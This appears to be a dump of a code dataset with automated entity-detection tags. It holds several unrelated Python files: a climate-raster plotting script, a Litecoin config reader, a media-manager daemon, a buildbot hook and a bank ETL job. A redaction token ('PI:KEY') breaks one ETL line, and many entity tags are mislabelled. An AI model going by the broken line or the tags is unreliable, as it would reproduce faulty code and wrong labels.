old_dir = '/Data/Base_Data/Climate/AK_CAN_2km/historical/AR5_CMIP5_models'
# begin = 1950
# end = 1965
else:
old_dir = '/Data/Base_Data/Climate/AK_CAN_2km/projected/AR5_CMIP5_models'
# begin = 2095
# end = 2100
figsize = (16,9)
out = {}
for v in variables:
path = os.path.join( base_dir,'downscaled', m, scenario, v )
print( path )
files = glob.glob( os.path.join( path, '*.tif' ) )
files = sort_files( only_years( files, begin=begin, end=end, split_on='_', elem_year=-1 ) )
out[ v ] = mp_map( masked_mean, files, nproc=4 )
if v == 'tas' or v == 'pr':
if m == 'ts323':
path = os.path.join( old_dir, v )
print( path )
else:
path = os.path.join( old_dir, scenario, m, v )
files = glob.glob( os.path.join( path, '*.tif' ) )
files = sort_files( only_years( files, begin=begin, end=end, split_on='_', elem_year=-1 ) )
out[ v+'_old' ] = mp_map( masked_mean, files, nproc=4 )
# nofix
path = os.path.join( base_dir,'downscaled_pr_nofix', m, scenario, v )
print( path )
files = glob.glob( os.path.join( path, '*.tif' ) )
files = sort_files( only_years( files, begin=begin, end=end, split_on='_', elem_year=-1 ) )
out[ v+'_nofix' ] = mp_map( masked_mean, files, nproc=4 )
plot_df = pd.DataFrame( out )
plot_df.index = pd.date_range( start=str(begin), end=str(end+1), freq='M' )
# sort the columns for output plotting cleanliness:
if 'tas' in variables:
col_list = ['tasmax', 'tas_old', 'tas', 'tasmin']
elif 'pr' in variables:
col_list = ['pr', 'pr_old', 'pr_nofix']
plot_df = plot_df[ col_list ] # get em in the order for plotting
if v == 'pr':
plot_df = plot_df.round()[['pr','pr_old']]
# now plot the dataframe
if begin == end:
title = 'EPSCoR SC AOI Temp Metrics {} {} {}'.format( m, scenario, begin )
else:
title = 'EPSCoR SC AOI Temp Metrics {} {} {} - {}'.format( m, scenario, begin, end )
if 'tas' in variables:
colors = ['red', 'black', 'blue', 'red' ]
else:
colors = [ 'blue', 'black', 'darkred' ]
ax = plot_df.plot( kind='line', title=title, figsize=figsize, color=colors )
output_dir = os.path.join( base_dir, 'compare_downscaling_versions_PR_no_fix' )
if not os.path.exists( output_dir ):
os.makedirs( output_dir )
# now plot the dataframe
out_metric_fn = 'temps'
if 'pr' in variables:
out_metric_fn = 'prec'
if begin == end:
output_filename = os.path.join( output_dir,'mean_{}_epscor_sc_{}_{}_{}.png'.format( out_metric_fn, m, scenario, begin ) )
else:
output_filename = os.path.join( output_dir,'mean_{}_epscor_sc_{}_{}_{}_{}.png'.format( out_metric_fn, m, scenario, begin, end ) )
plt.savefig( output_filename, dpi=400 )
plt.close()
# # # PRISM TEST VERSION DIFFERENCES # # # # # # #
# import rasterio
# import numpy as np
# import os, glob, itertools
# base_path = '/workspace/Shared/Tech_Projects/EPSCoR_Southcentral/project_data/prism/raw_prism'
# variables = [ 'tmax', 'tmin' ]
# for variable in variables:
# ak_olds = sorted( glob.glob( os.path.join( base_path, 'prism_raw_older', 'ak', variable, '*.asc' ) ) )
# ak_news = sorted( glob.glob( os.path.join( base_path, 'prism_raw_2016', 'ak', variable, '*.asc' ) ) )
# olds = np.array([ rasterio.open( i ).read( 1 ) for i in ak_olds if '_14' not in i ])
# news = np.array([ rasterio.open( i ).read( 1 ) *.10 for i in ak_news if '_14' not in i ])
# out = olds - news
# out[ (olds == -9999.0) | (news == -9999.0) ] = 0
# uniques = np.unique( out )
# uniques[ uniques > 0.01 ]
",9041,"[['PERSON', 'tasmax'], ['NRP', 'GeoTiff'], ['PERSON', 'lons'], ['PERSON', 'Rasterize'], ['LOCATION', 'split_on='], ['DATE_TIME', 'the month and year'], ['DATE_TIME', 'the month'], ['DATE_TIME', '11'], ['DATE_TIME', 'month'], ['PERSON', 'RETURNS'], ['DATE_TIME', 'year'], ['DATE_TIME', ""'year'""], ['DATE_TIME', ""'month'""], ['LOCATION', 'split_on='], ['DATE_TIME', 'month'], ['PERSON', 'RETURNS'], ['DATE_TIME', 'end year'], ['PERSON', 'geopandas'], ['PERSON', 'geopandas'], ['PERSON', 'os.chdir'], ['DATE_TIME', '1916'], ['DATE_TIME', '2000'], ['DATE_TIME', '1950'], ['DATE_TIME', '1965'], ['DATE_TIME', '1950'], ['DATE_TIME', '1965'], ['LOCATION', 'split_on='], ['LOCATION', 'nproc=4'], ['LOCATION', 'split_on='], ['LOCATION', 'nproc=4'], ['LOCATION', 'split_on='], ['LOCATION', 'nproc=4'], ['LOCATION', 'out_metric_fn'], ['LOCATION', 'out_metric_fn'], ['LOCATION', 'glob'], ['URL', 'np.as'], ['URL', 'np.as'], ['URL', 'Affine.tr'], ['URL', 'Affine.sc'], ['URL', 'np.na'], ['URL', 'glob.gl'], ['URL', 'os.path.ba'], ['URL', 'os.path.ba'], ['URL', 'df.so'], ['URL', 'sorted.fn.to'], ['URL', 'glob.gl'], ['URL', 'os.path.ba'], ['URL', 'df.ye'], ['URL', 'df.ye'], ['URL', 'slice.fn.to'], ['URL', 'rst.bo'], ['URL', 'rst.re'], ['URL', 'np.ma.ma'], ['URL', 'rst.re'], ['URL', 'np.me'], ['URL', 'matplotlib.us'], ['URL', 'pathos.mp'], ['URL', 'os.ch'], ['URL', 'StudyArea.sh'], ['URL', 'gpd.re'], ['URL', 'shp.bo'], ['URL', 'os.path.jo'], ['URL', 'glob.gl'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'glob.gl'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'glob.gl'], ['URL', 'os.path.jo'], ['URL', 'df.in'], ['URL', 'df.ro'], ['URL', 'df.pl'], ['URL', 'os.path.jo'], ['URL', 'os.pa'], ['URL', 'os.ma'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'plt.sa'], ['URL', 'plt.cl'], ['URL', 'glob.gl'], ['URL', 'os.path.jo'], ['URL', 'glob.gl'], ['URL', 'os.path.jo'], ['URL', 'np.ar'], ['URL', 'np.ar']]"
92,"# Copyright (c) 2010 Witchspace dummy@email.com
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the ""Software""), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED ""AS IS"", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
""""""
Utilities for reading litecoin configuration files.
""""""
def read_config_file(filename):
""""""
Read a simple ``'='``-delimited config file.
Raises :const:`IOError` if unable to open file, or :const:`ValueError`
if an parse error occurs.
""""""
f = open(filename)
try:
cfg = {}
for line in f:
line = line.strip()
if line and not line.startswith(""#""):
try:
(key, value) = line.split('=', 1)
cfg[key] = value
except ValueError:
pass # Happens when line has no '=', ignore
finally:
f.close()
return cfg
def read_default_config(filename=None):
""""""
Read litecoin default configuration from the current user's home directory.
Arguments:
- `filename`: Path to a configuration file in a non-standard location (optional)
""""""
if filename is None:
import os
import platform
home = os.getenv(""HOME"")
if not home:
raise IOError(""Home directory not defined, don't know where to look for config file"")
if platform.system() == ""Darwin"":
location = 'Library/Application Support/Litecoin/litecoin.conf'
else:
location = '.litecoin/litecoin.conf'
filename = os.path.join(home, location)
elif filename.startswith(""~""):
import os
filename = os.path.expanduser(filename)
try:
return read_config_file(filename)
except (IOError, ValueError):
pass # Cannot read config file, ignore
",2706,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2010'], ['LOCATION', 'Witchspace'], ['LOCATION', 'DAMAGES'], ['PERSON', 'WHETHER'], ['PERSON', 'platform.system'], ['PERSON', 'Darwin'], ['URL', 'email.com'], ['URL', 'line.st'], ['URL', 'line.st'], ['URL', 'f.cl'], ['URL', 'os.ge'], ['URL', 'platform.sy'], ['URL', 'litecoin.co'], ['URL', 'litecoin.co'], ['URL', 'os.path.jo'], ['URL', 'filename.st'], ['URL', 'os.pa']]"
93,"#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Smewt - A smart collection manager
# Copyright (c) 2010 Nicolas Wack dummy@email.com
#
# Smewt is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# Smewt is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see .
#
from pygoo import MemoryObjectGraph, Equal, ontology
from guessit.slogging import setupLogging
from smewt import config
from smewt.ontology import Episode, Movie, Subtitle, Media, Config
from smewt.base import cache, utils, Collection
from smewt.base.taskmanager import TaskManager, FuncTask
from smewt.taggers import EpisodeTagger, MovieTagger
from smewt.plugins.feedwatcher import FeedWatcher
from threading import Timer
import smewt
import time
import os
import logging
log = logging.getLogger(__name__)
class VersionedMediaGraph(MemoryObjectGraph):
def __init__(self, *args, **kwargs):
super(VersionedMediaGraph, self).__init__(*args, **kwargs)
def add_object(self, node, recurse = Equal.OnIdentity, excluded_deps = list()):
result = super(VersionedMediaGraph, self).add_object(node, recurse, excluded_deps)
if isinstance(result, Media):
result.lastModified = time.time()
return result
def clear_keep_config(self):
# we want to keep our config object untouched
tmp = MemoryObjectGraph()
tmp.add_object(self.config)
super(VersionedMediaGraph, self).clear()
self.add_object(tmp.find_one(Config))
def __getattr__(self, name):
# if attr is not found and starts with an upper case letter, it might be the name
# of one of the registered classes. In that case, return a function that would instantiate
# such an object in this graph
if name[0].isupper() and name in ontology.class_names():
def inst(basenode = None, **kwargs):
result = super(VersionedMediaGraph, self).__getattr__(name)(basenode, **kwargs)
if isinstance(result, Media):
result.lastModified = time.time()
return result
return inst
raise AttributeError, name
@property
def config(self):
try:
return self.find_one(Config)
except ValueError:
return self.Config()
class SmewtDaemon(object):
def __init__(self):
super(SmewtDaemon, self).__init__()
# Note: put log file in data dir instead of log dir so that it is
# accessible through the user/ folder static view
self.logfile = utils.path(smewt.dirs.user_data_dir, 'Smewt.log')
setupLogging(filename=self.logfile, with_time=True, with_thread=True)
if smewt.config.PERSISTENT_CACHE:
self.loadCache()
# get a TaskManager for all the import tasks
self.taskManager = TaskManager()
# get our main graph DB
self.loadDB()
# get our collections: series and movies for now
self.episodeCollection = Collection(name = 'Series',
# import episodes and their subtitles too
validFiles = [ Episode.isValidEpisode,
Subtitle.isValidSubtitle ],
mediaTagger = EpisodeTagger,
dataGraph = self.database,
taskManager = self.taskManager)
self.movieCollection = Collection(name = 'Movie',
# import movies and their subtitles too
validFiles = [ Movie.isValidMovie,
Subtitle.isValidSubtitle ],
mediaTagger = MovieTagger,
dataGraph = self.database,
taskManager = self.taskManager)
if config.REGENERATE_THUMBNAILS:
# launch the regeneration of the thumbnails, but only after everything
# is setup and we are able to serve requests
Timer(3, self.regenerateSpeedDialThumbnails).start()
if self.database.config.get('tvuMldonkeyPlugin'):
# load up the feed watcher
self.feedWatcher = FeedWatcher(self)
# FIXME: this should go into a plugin.init() method
from smewt.plugins import mldonkey
mldonkey.send_command('vm')
# do not rescan as it would be too long and we might delete some files that
# are on an unaccessible network share or an external HDD
self.taskManager.add(FuncTask('Update collections', self.updateCollections))
def quit(self):
log.info('SmewtDaemon quitting...')
self.taskManager.finishNow()
try:
self.feedWatcher.quit()
except AttributeError:
pass
self.saveDB()
if smewt.config.PERSISTENT_CACHE:
self.saveCache()
log.info('SmewtDaemon quitting OK!')
def _cacheFilename(self):
return utils.path(smewt.dirs.user_cache_dir, 'Smewt.cache',
createdir=True)
def loadCache(self):
cache.load(self._cacheFilename())
def saveCache(self):
cache.save(self._cacheFilename())
def clearCache(self):
cache.clear()
cacheFile = self._cacheFilename()
log.info('Deleting cache file: %s' % cacheFile)
try:
os.remove(cacheFile)
except OSError:
pass
def loadDB(self):
dbfile = smewt.settings.get('database_file')
if not dbfile:
dbfile = utils.path(smewt.dirs.user_data_dir, 'Smewt.database',
createdir=True)
smewt.settings.set('database_file', dbfile)
log.info('Loading database from: %s', dbfile)
self.database = VersionedMediaGraph()
try:
self.database.load(dbfile)
except:
log.warning('Could not load database %s', dbfile)
def saveDB(self):
dbfile = smewt.settings.get('database_file')
log.info('Saving database to %s', dbfile)
self.database.save(dbfile)
def clearDB(self):
log.info('Clearing database...')
self.database.clear_keep_config()
self.database.save(smewt.settings.get('database_file'))
def updateCollections(self):
self.episodeCollection.update()
self.movieCollection.update()
def rescanCollections(self):
self.episodeCollection.rescan()
self.movieCollection.rescan()
def _regenerateSpeedDialThumbnails(self):
import shlex, subprocess
from PIL import Image
from StringIO import StringIO
webkit2png = (subprocess.call(['which', 'webkit2png'], stdout=subprocess.PIPE) == 0)
if not webkit2png:
log.warning('webkit2png not found. please run: ""python setup.py install"" from within the 3rdparty/webkit2png folder')
return
def gen(path, filename):
width, height = 200, 150
log.info('Creating %dx%d screenshot for %s...' % (width, height, path))
filename = utils.path(smewt.dirs.user_data_dir, 'speeddial', filename, createdir=True)
cmd = 'webkit2png -g 1000 600 ""http://localhost:6543%s""' % path
screenshot, _ = subprocess.Popen(shlex.split(cmd),
stdout=subprocess.PIPE).communicate()
im = Image.open(StringIO(screenshot))
im.thumbnail((width, height), Image.ANTIALIAS)
im.save(filename, ""PNG"")
gen('/movies', 'allmovies.png')
gen('/movies/table', 'moviestable.png')
gen('/movies/recent', 'recentmovies.png')
gen('/series', 'allseries.png')
gen('/series/suggestions', 'episodesuggestions.png')
gen('/feeds', 'feeds.png')
def regenerateSpeedDialThumbnails(self):
self.taskManager.add(FuncTask('Regenerate thumbnails',
self._regenerateSpeedDialThumbnails))
",8704,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2010'], ['PERSON', 'Nicolas Wack'], ['LOCATION', 'self).__getattr__(name)(basenode'], ['PERSON', 'Smewt.log'], ['LOCATION', 'Collection(name'], ['NRP', 'Subtitle.isValidSubtitle'], ['PERSON', 'mediaTagger = EpisodeTagger'], ['NRP', 'dataGraph'], ['LOCATION', 'Collection(name'], ['NRP', 'Subtitle.isValidSubtitle'], ['PERSON', 'mediaTagger = MovieTagger'], ['PERSON', 'self.taskManager.finishNow'], ['PERSON', 'self.saveCache'], ['PERSON', 'self.database = VersionedMediaGraph'], ['PERSON', 'utils.path(smewt.dirs.user_data_dir'], ['LOCATION', 'Image'], ['PERSON', ""self.taskManager.add(FuncTask('Regenerate""], ['URL', 'http://www.gnu.org/licenses/'], ['URL', 'email.com'], ['URL', 'guessit.sl'], ['URL', 'smewt.ba'], ['URL', 'smewt.ba'], ['URL', 'smewt.pl'], ['URL', 'logging.ge'], ['URL', 'result.la'], ['URL', 'tmp.ad'], ['URL', 'self.co'], ['URL', 'self.ad'], ['URL', 'tmp.fi'], ['URL', 'ontology.cl'], ['URL', 'result.la'], ['URL', 'self.fi'], ['URL', 'self.Co'], ['URL', 'utils.pa'], ['URL', 'smewt.dirs.us'], ['URL', 'smewt.config.PE'], ['URL', 'Episode.is'], ['URL', 'Subtitle.is'], ['URL', 'self.mo'], ['URL', 'Movie.is'], ['URL', 'Subtitle.is'], ['URL', 'config.RE'], ['URL', 'self.re'], ['URL', 'self.database.config.ge'], ['URL', 'plugin.in'], ['URL', 'smewt.pl'], ['URL', 'mldonkey.se'], ['URL', 'self.taskManager.ad'], ['URL', 'log.in'], ['URL', 'self.taskManager.fi'], ['URL', 'self.sa'], ['URL', 'smewt.config.PE'], ['URL', 'self.sa'], ['URL', 'log.in'], ['URL', 'utils.pa'], ['URL', 'smewt.dirs.us'], ['URL', 'Smewt.ca'], ['URL', 'cache.sa'], ['URL', 'cache.cl'], ['URL', 'log.in'], ['URL', 'os.re'], ['URL', 'smewt.settings.ge'], ['URL', 'utils.pa'], ['URL', 'smewt.dirs.us'], ['URL', 'smewt.settings.se'], ['URL', 'log.in'], ['URL', 'smewt.settings.ge'], ['URL', 'log.in'], ['URL', 'self.database.sa'], ['URL', 'log.in'], ['URL', 'self.database.cl'], ['URL', 'self.database.sa'], ['URL', 'smewt.settings.ge'], ['URL', 'self.mo'], ['URL', 'self.episodeCollection.re'], ['URL', 'self.movieCollection.re'], ['URL', 'subprocess.ca'], ['URL', 'setup.py'], ['URL', 'log.in'], ['URL', 'utils.pa'], ['URL', 'smewt.dirs.us'], ['URL', 'im.th'], ['URL', 'Image.AN'], ['URL', 'im.sa'], ['URL', 'allmovies.pn'], ['URL', 'moviestable.pn'], ['URL', 'recentmovies.pn'], ['URL', 'allseries.pn'], ['URL', 'episodesuggestions.pn'], ['URL', 'feeds.pn'], ['URL', 'self.taskManager.ad']]"
94,"#!/usr/local/bin/python
#
# BitKeeper hook script.
#
# svn_buildbot.py was used as a base for this file, if you find any bugs or
# errors please email me.
#
# Amar Takhar dummy@email.com
'''
/path/to/bk_buildbot.py --repository ""$REPOS"" --revision ""$REV"" --branch \
"""" --bbserver localhost --bbport 9989
'''
import commands
import sys
import os
import re
if sys.version_info < (2, 6):
import sets
# We have hackish ""-d"" handling here rather than in the Options
# subclass below because a common error will be to not have twisted in
# PYTHONPATH; we want to be able to print that error to the log if
# debug mode is on, so we set it up before the imports.
DEBUG = None
if '-d' in sys.argv:
i = sys.argv.index('-d')
DEBUG = sys.argv[i+1]
del sys.argv[i]
del sys.argv[i]
if DEBUG:
f = open(DEBUG, 'a')
sys.stderr = f
sys.stdout = f
from twisted.internet import defer, reactor
from twisted.python import usage
from twisted.spread import pb
from twisted.cred import credentials
class Options(usage.Options):
optParameters = [
['repository', 'r', None,
""The repository that was changed.""],
['revision', 'v', None,
""The revision that we want to examine (default: latest)""],
['branch', 'b', None,
""Name of the branch to insert into the branch field. (REQUIRED)""],
['category', 'c', None,
""Schedular category.""],
['bbserver', 's', 'localhost',
""The hostname of the server that buildbot is running on""],
['bbport', 'p', 8007,
""The port that buildbot is listening on""]
]
optFlags = [
['dryrun', 'n', ""Do not actually send changes""],
]
def __init__(self):
usage.Options.__init__(self)
def postOptions(self):
if self['repository'] is None:
raise usage.error(""You must pass --repository"")
class ChangeSender:
def getChanges(self, opts):
""""""Generate and stash a list of Change dictionaries, ready to be sent
to the buildmaster's PBChangeSource.""""""
# first we extract information about the files that were changed
repo = opts['repository']
print ""Repo:"", repo
rev_arg = ''
if opts['revision']:
rev_arg = '-r""%s""' % (opts['revision'], )
changed = commands.getoutput(""bk changes -v %s -d':GFILE:\\n' '%s'"" % (
rev_arg, repo)).split('\n')
# Remove the first line, it's an info message you can't remove (annoying)
del changed[0]
change_info = commands.getoutput(""bk changes %s -d':USER:\\n$each(:C:){(:C:)\\n}' '%s'"" % (
rev_arg, repo)).split('\n')
# Remove the first line, it's an info message you can't remove (annoying)
del change_info[0]
who = change_info.pop(0)
branch = opts['branch']
message = '\n'.join(change_info)
revision = opts.get('revision')
changes = {'who': who,
'branch': branch,
'files': changed,
'comments': message,
'revision': revision}
if opts.get('category'):
changes['category'] = opts.get('category')
return changes
def sendChanges(self, opts, changes):
pbcf = pb.PBClientFactory()
reactor.connectTCP(opts['bbserver'], int(opts['bbport']), pbcf)
d = pbcf.login(credentials.UsernamePassword('change', 'changepw'))
d.addCallback(self.sendAllChanges, changes)
return d
def sendAllChanges(self, remote, changes):
dl = remote.callRemote('addChange', changes)
return dl
def run(self):
opts = Options()
try:
opts.parseOptions()
if not opts['branch']:
print ""You must supply a branch with -b or --branch.""
sys.exit(1);
except usage.error, ue:
print opts
print ""%s: %s"" % (sys.argv[0], ue)
sys.exit()
changes = self.getChanges(opts)
if opts['dryrun']:
for k in changes.keys():
print ""[%10s]: %s"" % (k, changes[k])
print ""*NOT* sending any changes""
return
d = self.sendChanges(opts, changes)
def quit(*why):
print ""quitting! because"", why
reactor.stop()
def failed(f):
print ""FAILURE: %s"" % f
reactor.stop()
d.addErrback(failed)
d.addCallback(quit, ""SUCCESS"")
reactor.callLater(60, quit, ""TIMEOUT"")
reactor.run()
if __name__ == '__main__':
s = ChangeSender()
s.run()
",4654,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['PERSON', 'Amar Takhar dummy@email.com'], ['LOCATION', 'sys.argv'], ['PERSON', 'buildbot'], ['PERSON', 'dryrun'], ['PERSON', 'buildmaster'], ['LOCATION', 'del changed[0]\n\n change_info'], ['PERSON', 'del change_info[0]\n\n '], ['PERSON', 'pbcf'], ['URL', 'buildbot.py'], ['URL', 'email.com'], ['URL', 'buildbot.py'], ['URL', 'sys.ve'], ['URL', 'sys.ar'], ['URL', 'sys.argv.in'], ['URL', 'sys.ar'], ['URL', 'sys.ar'], ['URL', 'sys.ar'], ['URL', 'sys.st'], ['URL', 'sys.st'], ['URL', 'twisted.int'], ['URL', 'twisted.py'], ['URL', 'twisted.cr'], ['URL', 'usage.er'], ['URL', 'commands.ge'], ['URL', 'commands.ge'], ['URL', 'opts.ge'], ['URL', 'opts.ge'], ['URL', 'opts.ge'], ['URL', 'reactor.co'], ['URL', 'credentials.Us'], ['URL', 'd.ad'], ['URL', 'self.se'], ['URL', 'remote.ca'], ['URL', 'opts.pa'], ['URL', 'usage.er'], ['URL', 'sys.ar'], ['URL', 'self.ge'], ['URL', 'changes.ke'], ['URL', 'self.se'], ['URL', 'reactor.st'], ['URL', 'reactor.st'], ['URL', 'd.ad'], ['URL', 'd.ad'], ['URL', 'reactor.ca'], ['URL', 'reactor.ru'], ['URL', 's.ru']]"
95,"#coding=UTF-8
from pyspark import SparkContext, SparkConf, SQLContext, Row, HiveContext
from pyspark.sql.types import *
from datetime import date, datetime, timedelta
import sys, re, os
st = datetime.now()
conf = SparkConf().setAppName('PROC_O_LNA_XDXT_CUSTOMER_INFO').setMaster(sys.argv[2])
sc = SparkContext(conf = conf)
sc.setLogLevel('WARN')
if len(sys.argv) > 5:
if sys.argv[5] == ""hive"":
sqlContext = HiveContext(sc)
else:
sqlContext = SQLContext(sc)
hdfs = sys.argv[3]
dbname = sys.argv[4]
#处理需要使用的日期
etl_date = sys.argv[1]
#etl日期
V_DT = etl_date
#上一日日期
V_DT_LD = (date(int(etl_date[0:4]), int(etl_date[4:6]), int(etl_date[6:8])) + timedelta(-1)).strftime(""%Y%m%d"")
#月初日期
V_DT_FMD = date(int(etl_date[0:4]), int(etl_date[4:6]), 1).strftime(""%Y%m%d"")
#上月末日期
V_DT_LMD = (date(int(etl_date[0:4]), int(etl_date[4:6]), 1) + timedelta(-1)).strftime(""%Y%m%d"")
#10位日期
V_DT10 = (date(int(etl_date[0:4]), int(etl_date[4:6]), int(etl_date[6:8]))).strftime(""%Y-%m-%d"")
V_STEP = 0
O_CI_XDXT_CUSTOMER_INFO = sqlContext.read.parquet(hdfs+'/O_CI_XDXT_CUSTOMER_INFO/*')
O_CI_XDXT_CUSTOMER_INFO.registerTempTable(""O_CI_XDXT_CUSTOMER_INFO"")
#任务[12] 001-01::
V_STEP = V_STEP + 1
#先删除原表所有数据
ret = os.system(""hdfs dfs -rm -r /""+dbname+""/F_CI_XDXT_CUSTOMER_INFO/*.parquet"")
#从昨天备表复制一份全量过来
ret = os.system(""hdfs dfs -cp -f /""+dbname+""/F_CI_XDXT_CUSTOMER_INFO_BK/""+V_DT_LD+"".parquet /""+dbname+""/F_CI_XDXT_CUSTOMER_INFO/""+V_DT+"".parquet"")
F_CI_XDXT_CUSTOMER_INFO = sqlContext.read.parquet(hdfs+'/F_CI_XDXT_CUSTOMER_INFO/*')
F_CI_XDXT_CUSTOMER_INFO.registerTempTable(""F_CI_XDXT_CUSTOMER_INFO"")
sql = """"""
SELECT A.CUSTOMERID AS CUSTOMERID
,A.CUSTOMERNAME AS CUSTOMERNAME
,A.CUSTOMERTYPE AS CUSTOMERTYPE
,A.CERTTYPE AS CERTTYPE
,A.CERTID AS CERTID
,A.CUSTOMERPASSWORD AS CUSTOMERPASSWORD
,A.INPUTORGID AS INPUTORGID
,A.INPUTUSERID AS INPUTUSERID
,A.INPUTDATE AS INPUTDATE
,A.REMARK AS REMARK
,A.MFCUSTOMERID AS MFCUSTOMERID
,A.STATUS AS STATUS
,A.BELONGGROUPID AS BELONGGROUPID
,A.CHANNEL AS CHANNEL
,A.LOANCARDNO AS LOANCARDNO
,A.CUSTOMERSCALE AS CUSTOMERSCALE
,A.CORPORATEORGID AS CORPORATEORGID
,A.REMEDYFLAG AS REMEDYFLAG
,A.DRAWFLAG AS DRAWFLAG
,A.MANAGERUSERID AS MANAGERUSERID
,A.MANAGERORGID AS MANAGERORGID
,A.DRAWELIGIBILITY AS DRAWELIGIBILITY
,A.BLACKSHEETORNOT AS BLACKSHEETORNOT
,A.CONFIRMORNOT AS CONFIRMORNOT
,A.CLIENTCLASSN AS CLIENTCLASSN
,A.CLIENTCLASSM AS CLIENTCLASSM
,A.BUSINESSSTATE AS BUSINESSSTATE
,A.MASTERBALANCE AS MASTERBALANCE
,A.UPDATEDATE AS UPDATEDATE
,A.FR_ID AS FR_ID
,V_DT AS ODS_ST_DATE
,'LNA' AS ODS_SYS_ID
FROM O_CI_XDXT_CUSTOMER_INFO A --客户基本信息
""""""
sql = re.sub(r""\bV_DT\b"", ""'""+V_DT10+""'"", sql)
F_CI_XDXT_CUSTOMER_INFO_INNTMP1 = sqlContext.sql(sql)
F_CI_XDXT_CUSTOMER_INFO_INNTMP1.registerTempTable(""F_CI_XDXT_CUSTOMER_INFO_INNTMP1"")
#F_CI_XDXT_CUSTOMER_INFO = sqlContext.read.parquet(hdfs+'/F_CI_XDXT_CUSTOMER_INFO/*')
#F_CI_XDXT_CUSTOMER_INFO.registerTempTable(""F_CI_XDXT_CUSTOMER_INFO"")
sql = """"""
SELECT DST.CUSTOMERID --客户编号:src.CUSTOMERID
,DST.CUSTOMERNAME --客户名称:src.CUSTOMERNAME
,DST.CUSTOMERTYPE --客户类型:src.CUSTOMERTYPE
,DST.CERTTYPE --证件类型:src.CERTTYPE
,DST.CERTID --证件号:src.CERTID
,DST.CUSTOMERPASSWORD --客户口令:src.CUSTOMERPASSWORD
,DST.INPUTORGID --登记机构:src.INPUTORGID
,DST.INPUTUSERID --登记人:src.INPUTUSERID
,DST.INPUTDATE --登记日期:src.INPUTDATE
,DST.REMARK --备注:src.REMARK
,DST.MFCUSTOMERID --核心客户号:src.MFCUSTOMERID
,DST.STATUS --状态:src.STATUS
,DST.BELONGGROUPID --所属关联集团代码:src.BELONGGROUPID
,DST.CHANNEL --渠道:src.CHANNEL
,DST.LOANCARDNO --贷款卡编号:src.LOANCARDNO
,DST.CUSTOMERSCALE --客户规模:src.CUSTOMERSCALE
,DST.CORPORATEORGID --法人机构号:src.CORPORATEORGID
,DST.REMEDYFLAG --补登标志:src.REMEDYFLAG
,DST.DRAWFLAG --领取标志:src.DRAWFLAG
,DST.MANAGERUSERID --管户人:src.MANAGERUSERID
,DST.MANAGERORGID --管户机构ID:src.MANAGERORGID
,DST.DRAWELIGIBILITY --领取信息:src.DRAWELIGIBILITY
,DST.BLACKSHEETORNOT --是否黑名当客户:src.BLACKSHEETORNOT
,DST.CONFIRMORNOT --是否生效:src.CONFIRMORNOT
,DST.CLIENTCLASSN --当前客户分类:src.CLIENTCLASSN
,DST.CLIENTCLASSM --客户分类调整:src.CLIENTCLASSM
,DST.BUSINESSSTATE --存量字段标志:src.BUSINESSSTATE
,DST.MASTERBALANCE --单户余额:src.MASTERBALANCE
,DST.UPDATEDATE --更新日期:src.UPDATEDATE
,DST.FR_ID --法人代码:src.FR_ID
,DST.ODS_ST_DATE --平台日期:src.ODS_ST_DATE
,DST.ODS_SYS_ID --源系统代码:src.ODS_SYS_ID
FROM F_CI_XDXT_CUSTOMER_INFO DST
LEFT JOIN F_CI_XDXT_CUSTOMER_INFO_INNTMP1 SRC
ON SRC.CUSTOMERID = DST.CUSTOMERID
AND SRC.FR_ID = DST.FR_ID
WHERE SRC.CUSTOMERID IS NULL """"""
sql = re.sub(r""\bV_DT\b"", ""'""+V_DT10+""'"", sql)
F_CI_XDXT_CUSTOMER_INFO_INNTMP2 = sqlContext.sql(sql)
dfn=""F_CI_XDXT_CUSTOMER_INFO/""+V_DT+"".parquet""
PI:KEY.unionAll(F_CI_XDXT_CUSTOMER_INFO_INNTMP1)
F_CI_XDXT_CUSTOMER_INFO_INNTMP1.cache()
F_CI_XDXT_CUSTOMER_INFO_INNTMP2.cache()
nrowsi = F_CI_XDXT_CUSTOMER_INFO_INNTMP1.count()
nrowsa = F_CI_XDXT_CUSTOMER_INFO_INNTMP2.count()
F_CI_XDXT_CUSTOMER_INFO_INNTMP2.write.save(path = hdfs + '/' + dfn, mode='overwrite')
F_CI_XDXT_CUSTOMER_INFO_INNTMP1.unpersist()
F_CI_XDXT_CUSTOMER_INFO_INNTMP2.unpersist()
et = datetime.now()
print(""Step %d start[%s] end[%s] use %d seconds, insert F_CI_XDXT_CUSTOMER_INFO lines %d, all lines %d"") % (V_STEP, st.strftime(""%H:%M:%S""), et.strftime(""%H:%M:%S""), (et-st).seconds, nrowsi, nrowsa)
